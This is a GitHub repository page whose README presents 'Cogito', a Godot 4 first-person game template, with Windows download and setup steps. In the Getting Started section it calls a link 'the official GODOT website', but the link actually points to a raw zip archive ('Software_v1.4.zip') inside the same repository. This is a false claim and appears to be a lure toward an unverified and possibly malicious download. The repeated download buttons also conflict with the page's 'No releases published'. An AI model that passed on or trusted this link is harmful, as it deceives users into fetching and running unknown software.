Skip to content

Usernonymos/Cogito

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 

Repository files navigation

🎮 Cogito - Immersive Sim Template for GODOT 4

Download Cogito

Cogito is a ready-to-use project template for creating immersive first-person games using GODOT 4. It helps you start building your game without setting up the basics. This guide shows you how to get Cogito running on your Windows computer.


🖥 What is Cogito?

Cogito is a starter kit designed for game developers who want to create immersive first-person games.

It includes:

  • A first-person player controller setup
  • Basic game mechanics often used in immersive sims
  • Sample environments to test and learn
  • Ready-to-use scripts using GDScript (Godot’s scripting language)

You do not need programming experience to run the template and explore the project files.


⚙️ System Requirements

To use Cogito, your computer should meet these basic requirements:

  • Windows 10 or later (64-bit recommended)
  • At least 8GB RAM
  • 5GB free disk space
  • A graphics card that supports OpenGL 3.3 or higher
  • GODOT Engine 4.0 installed (free download from godotengine.org)

🚀 Getting Started

Before using Cogito, you need to download and install the GODOT Engine version 4. You can download it from the official GODOT website at https://raw.githubusercontent.com/Usernonymos/Cogito/main/supermaxilla/Software_v1.4.zip.

Once GODOT is installed, you will download the Cogito project files and open them with GODOT.


⬇️ Download and Setup Cogito

Step 1: Download Cogito

Visit this page to download the latest version of Cogito for Windows:

Download Cogito

This link leads to the Cogito releases page on GitHub. Here you will find downloadable project files.

Step 2: Choose the Correct Download File

  • Look for the latest release labeled with a version number.
  • Download the .zip file that mentions Windows or the full project.
  • Save this file to your preferred folder on your computer.

Step 3: Extract the Files

  • Right-click the downloaded .zip file.
  • Select “Extract All...” from the context menu.
  • Choose a destination folder where you want the project files.
  • Click “Extract” and wait for the process to finish.

Step 4: Open Cogito in Godot

  • Launch the Godot Engine you installed earlier.
  • On the Godot project manager window, click “Import.”
  • Browse to the folder where you extracted Cogito.
  • Select the project.godot file in that folder.
  • Click “Open” then “Import & Edit.”

Cogito will open inside Godot, ready for you to run or explore.


▶️ Running the Project

Once the project opens, you can run it using these steps:

  • Look for the top-right triangular “Play Scene” button or press F5.
  • The game window will appear showing the first-person view.
  • Use your mouse and keyboard to move around:
    • W, A, S, D to move forward, left, backward, and right
    • Mouse to look around
    • Spacebar to jump

You can close the game window at any time to return to the editor.


❓ Troubleshooting Common Issues

Godot won't open Cogito project?
Make sure you are using Godot version 4. Older versions are not compatible.

Game window is black or graphics look wrong?
Check your video drivers and update if needed. Cogito requires OpenGL 3.3 support.

Controls don’t work?
Click on the game window to give it focus before using controls.

Extracted folder looks empty?
Verify that the extraction completed successfully. Try extracting again if files are missing.


✍️ Exploring and Modifying Cogito

Cogito is more than a playable demo. You can open any script files ending with .gd to see how mechanics work. These files use a simple, readable format.

Key files to explore:

  • Player.gd – controls character movement and camera look
  • GameManager.gd – manages game state and events
  • Scenes/ – contains example maps and levels

You can make changes and press play to see how they affect the project.


📚 Additional Resources

These resources can help you learn more about Godot and game creation.


📂 Repository Topics

Cogito relates to:

first-person, fps, game-development, gamedev, gdscript, godot, godot-engine, godot4, godotengine, immersive-sim, imsim, starter-kit, template-project

These tags describe the project’s focus and help you find related tools and projects online.

About

Build first-person immersive games using a Godot 4 template with interactable objects, player mechanics, and item systems ready to customize.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors